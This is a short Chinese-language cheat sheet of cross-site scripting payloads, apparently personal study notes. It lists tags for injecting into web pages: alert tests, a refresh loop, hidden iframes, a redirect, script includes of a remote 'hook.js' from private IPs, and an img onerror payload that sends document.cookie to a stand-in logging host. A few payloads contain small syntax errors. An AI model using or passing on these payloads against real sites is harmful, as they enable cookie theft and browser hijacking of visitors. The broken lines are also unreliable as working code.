插入的代码不一定是script标签，也可以是meta标签

测试：
<script>alert("存在xss漏洞")</script>

不断刷新
<meta http-equiv="refresh" content="0;">

嵌入其他网站链接
<iframe src="http://www.baidu.com" width=0 height=0></iframe>

跳转到其他页面
<script>window.location=http://www.baidu.com</script>

盗取cookie信息
<script>alert(document.cookie)</script>

引入hook.js
<script src="http://192.168.10.14/hook.js"></script>

隐藏图片盗取信息
<img src=x onerror="var img = newImage();img.style.width = img.style.height = 0; img.src='http://www.xxx.com/log.php?c='+document.cookie">

创建框架链接hook.js
<script>
  var f=document.createElement('iframe');
  f.style.border=f.style.width=f.style.height='0';
  document.body.appendChild(f);
  f.contentWindow.document.write('<script src=http://192.168.10.13/hook.hs></script>')
</script>

